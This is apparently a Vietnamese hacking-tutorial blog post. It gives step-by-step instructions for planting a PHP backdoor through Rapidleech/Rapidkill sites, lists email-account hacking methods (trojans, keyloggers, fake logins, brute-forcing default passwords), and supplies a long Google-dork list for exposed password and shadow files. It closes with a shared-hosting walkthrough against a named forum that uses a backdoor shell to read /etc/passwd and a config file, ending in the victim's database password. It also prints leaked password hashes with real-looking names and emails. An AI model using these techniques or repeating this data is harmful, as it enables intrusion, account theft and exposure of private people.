Rapidleech và Rapidkill là 2 script viết bằng PHP, hỗ trợ download file ở rapidshare sang hosting.
Bài viết sẽ dựa trên một sơ hở nhỏ mà Rapidleech, Rapidkill mắc phải đó là không phân biệt loại tập tin được tải vào hosting. Và tui sẽ tận dụng sơ hở đó để tải backdoor = PHP vô
1. Đầu tiên bạn lên google gõ “rapidleech v2.2″ hoặc “Rapidkill”, sau khi tìm được website nào có sử dụng chúng thì bạn lưu lại.
2. Tiếp đến bạn vào www.rapidshare.de upload 1 con backdoor lên đó, rồi lưu link lại.
3. Mở trang web chứa Rapidleech hoặc Rapidkill mà bạn tìm được ở Bước 1, tìm đến khung nhập URL rapidshare, bạnn nnhập vào link con backdoor ở Bước 2.
4. Như vậy là backdoor đã được upload, giả sử website có link là:
domain.com/rapidleech/
Và backdoor có link là: (Giả sử thôi nha)
rapidshare.de/files/21461115/testtest.php.html
Bạn truy nhập vào backdoor theo đường dẫn:
domain.com/rapidleech/testtest.php
* Cách fix lỗi của Rapidleech, rapidkill tương tự:
Mở file function.php, tìm đoạn:
Code:
fputs($fp,$zapros);
fflush($fp);
Thêm vào bên dưới đoạn:
Code:
$link = strtolower($_GET['link']);
$link = explode(”.”, $link);
if ( $link[count($link)-2] == “php” )
{
print “Link không hợp lệ.”;
exit;
}
Vì cốt lõi cái này nó nhận link ở biến $link nên chỉ cần check ở đấy là ok.
* h*ck Mail:
Cach1 :
Hỏi trực tiếp : thật điên rồ .
Cach 2 :
Bạn biết thông tin về người đó ,vậy hãy nhỡ yahoo giúp đỡ.Cách này trược kia có thể thực hiện được nhưng bây giờ yahoo không cho request.
Cach 3 :
Sử dụng virut-trojan. đây là cách hay sử dụng nhất của hacker.Có rất nhiều bài viết hướng dẫn các bạn hãy tự tham khảo.Có hàng trăm virut trojan cho bạn lựa chọn tùy bạn thui.
Cach 4 :
Sử dụng các chương trình cr*ck(bẻ )
ví dụ yahoomail thì có:cr*ckpassyahoo
hotmail thì có :cr*ck passhotmail.
Cach 5 :
Sử dụng các chương trình fake( bẫy lỗi) như fake login, giả giao diện mail…….
Cach 6 :Bạn có một website tại sao không sử dụng Godwill gắn chúng vô web .
Cach 7 : Nếu ở dịch vụ bạn đang ngồi có thể sử dụng keylogger 5.04,perfecf keyloggerv1.47, starrcmd……..rất nhiều.
Cach 8 : Tấn công phê chuẩn đầu vào .
với cách này bạn có thể vào mail mà không cần đăng nhập .Thật bất ngờ khi vào mà không cần biết pass hì.
Cach 9 :
Lỗi đơn giản lắm password yahoo bị mắc lỗi default password
” yahoo***”
vậy *** ở đây là gì đơn giản là 3 con số những số này nằm trong khoảng từ 0–>999 việc brute chở nên dễ dàng rồi………….
Tuy nhiên big problem nằm ở chỗ nếu hì hục nghiên cứu làm sao modify info ngay tại yahoo thì có vẻ như không được ổn . Nhớ rằng yahoo là reseller của INWW việc chúng ta cần làm là nhào vô cái Registry key để lấy info sau đó quay ra inww.com để change infor
Chúc các bạn thành công. (Nhưng trong 9 cách này, bi giờ chắc chỉ còn áp dụng được một vài cách thoai! “Gà” bây giờ hiếm lắm nên cũng hok “Múa rìu qua mắt …pro” được!
*h*ck bằng Google:
Cách đây vài ngày tôi có đọc trên một forum nói về cách có thể dùng Goggle.com để tìm các thông tin quan trọng mà không cần bẻ khóa một website nào hết.
Bạn biết đối Google.com khi “search” bạn có thể dùng một số từ khóa để tìm một số cụm từ của các website thường không muốn người khác vào.Google là một công cụ tuyệt vời nếu các bạn dùng sẽ cảm thấy nó hay thế nào
Vậy chúng ta hảy bắt đầu nha.
Bạn vào website google.com và bắt đầu đánh dòng lệnh sau trên ô Search:
allintitle: “index of/root”
Sau đó bạn sẻ thấy khoảng 3120 sites có cụm từ này, bây giờ bạn có thể từng cái một kiểm tra xem có thông tin nào bạn cần không,
Thế nhưng có bạn không thích các thông tin này, nhưng lại thích tìm hiểu về password của admin các site, các bạn có thể đánh dòng lệnh sau:
inurl:”auth_user_file.txt”
Wow, bây giờ các bạn tha hồ mà nghiên cứu password & username, khi tôi đánh dòng lệnh này, website đầu tiên mà tôi bấm vào là Here và nó cho tôi data như sau:
$1$nr$90wmeMQIDw0HforiU2vUG1|admin|admin|Martin|Kl ässner|martin-klaessner@online.de|on
$1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Martin|norm al|Martin|Klässner|martin-klaessner@online.de|on
$1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Juergen|nor mal|Jürgen|Klässner|juergen-klaessner@online.de|on
$1$as$reDTTzzp8RaJUXVjXNksi0|Mauer_Harald|normal|H arald|Mauer|hmauer@germering.baynet.de|on
Cái này là cái gì vậy nè, phần này dành cho các cao thủ diển dịch nhen hihihi.
Nói chung với Google.com các bạn có thể dùng các chuổi sau đây, và chắc chắn các bạn sẻ không bao giờ chán khi lên net nửa đâu.
“Index of /admin”
“Index of /password”
“Index of /mail”
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetypeoc
allintitle: restricted filetype :mail
allintitle: restricted filetypeoc site:gov
inurlasswd filetype:txt
inurl:admin filetypeb
inurl:iisadmin
inurl:”auth_user_file.txt”
inurl:”wwwroot/*.”
top secret site:mil
confidential site:mil
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart
ALTERNATIVE INPUTS
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
~
index.html.bak
.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi
* h*ck 4rum (cũng chỉ là 1 cách h*ck local cổ điển thoai)
Chào các bạn , hôm nay mình xin giới thiệu 1 cách h*ck forum , theo tôi nghĩ nó ở mức nguy hiểm cao , hầu hết các diễn đàn php đều có cơ sở dữ SQL và nội dung bài viết này làm cách nào là đọc file config.php , trong khi họ đã chmod để lấy pass mySQL của victim , sữ dụng phpmyadmin để drop hay đoạt quyền admin diễn đàn . Nếu bạn là 1 hacker tôi nói đến đây là kết thúc bài viết , tôi nghĩ bạn đủ thông minh để hiểu và không nên mất thời gian xem những cái mà mình đã biết rồi . Còn ngược lại bạn chưa hiểu thì chúng ta tiếp tục sang bước tiếp theo nhé .bài viết này dành cho newbie Okie chứ?
Ở đây tôi lấy 1 site vd www.forums.ngoisaonho.info site này mới thành lập chưa có thành viên nên mức độ ảnh hưởng sẽ không cao , cho việc tôi dùng nó để miêu tả 1 bài viết . Bạn dùng 1 công cụ để kiểm tra victim của bạn mua host ở đâu www.checkdomain.com bạn có thể dùng nó ! chúng ta tiếp tục nhé
Bước 1 : Up load backdoor lên host của bạn cùng sever lên host victim . Tôi dùng remview bạn dùng cái gì thì tuỳ (vào google đánh từ khóa remview để down về . vì có nhiều cách để local . có thể dùng cgitelnet cũng được)
copy đoạn code remview.php
down tại http://www.ktv4vn.com/rem.zip
Bước 2
okie ! up con backdoor này lên host của bạn và chạy nó với link
http://www.localhost.com/remview.php
Có 1 khó khăn cho tôi khi host của victim chmod khả chuẩn khiến tôi không thể view host . Tôi phải đi đường vòng sữ dụng chức năng Shell commands
okie trong Shell commands bạn cho run lệnh
Trích:
cat /etc/passwd;
Trích:
ngoisaon:x:33217:33218::/home/ngoisaon:/usr/local/cpanel/bin/noshell
Tiếp trong shell commands bạn cho run lệnh
cat /etc/userdomains;
Tôi tìm đúng domain của victim như vậy ta có user victim là ngoisaon
Trích:
ngoisaonho.info: ngoisaon
Như phần trên đã nói host victim chmod khá chuẩn nên tôi phải tiếp tục sữ dụng công cụ Shell commands để view host victim
trong Shell commands run lệnh dir với user bạn vừa tìm được như sau:
dir /home/victim/public_html/;
thu được
Trích:
cgi-bin index.htm _private _vti_inf.html _vti_txt xoa
diendan music _vti_bin _vti_log wait.gif
forums postinfo.html _vti_cnf _vti_pvt welcome
Chạy tiếp lện dir để view thư mục forums
dir /home/victim/public_html/forums;
thu được
Trích:
admin.php fonts MBinstall.php style_images
cache html modules uploads
cgi-bin icon_db_hack.php show.php viewsong.php
conf_global.php index.php Skin xoa
conf_mime_types.php install_templates.txt sources
css.php ipchat.php ssi.php
datamusic.sql lang ssi_templates
Cái mà tôi cần view là file conf_global.php run với lện cat như sau :
cat /home/victim/public_html/forums/conf_global.php;
Trích:
$INFO['sql_database'] = ‘ngoisaon_Forums’;
$INFO['sql_driver'] = ‘mySQL’;
$INFO['sql_host'] = ‘localhost’;
$INFO['sql_pass'] = ‘HANOIMUATHU’;
Đến đây bạn đã lấy thấy được user : ngoisaon_Forums và pass là HANOIMUATHU , việc còn lại là dùng nó để vào phpmyadmin của victim , bạn vào phpmyadmin sẽ có rất nhiều cho vui , nên nhớ rằng để người khác vào phpmyadmin của mình điều này còn tệ hơn việc victim bị h*ck pass admin trong forum , bạn có thể vào phpmyadmin của victim bằng nhiều cách có thể tìm link của victim hay setup phpmyadmin ở host bạn hay sữ dụng 1 tool nào đó để hổ trợ bạn làm việc này .
Hình như remview này mọi người thường dùng http://php.spb.ru/remview/remview_2003_10_23.zip
reflink:http://roseandgun.wordpress.com/2008/04/19/hack-website-s%E1%BB%AD-d%E1%BB%A5ng-rapidleech-rapidkill/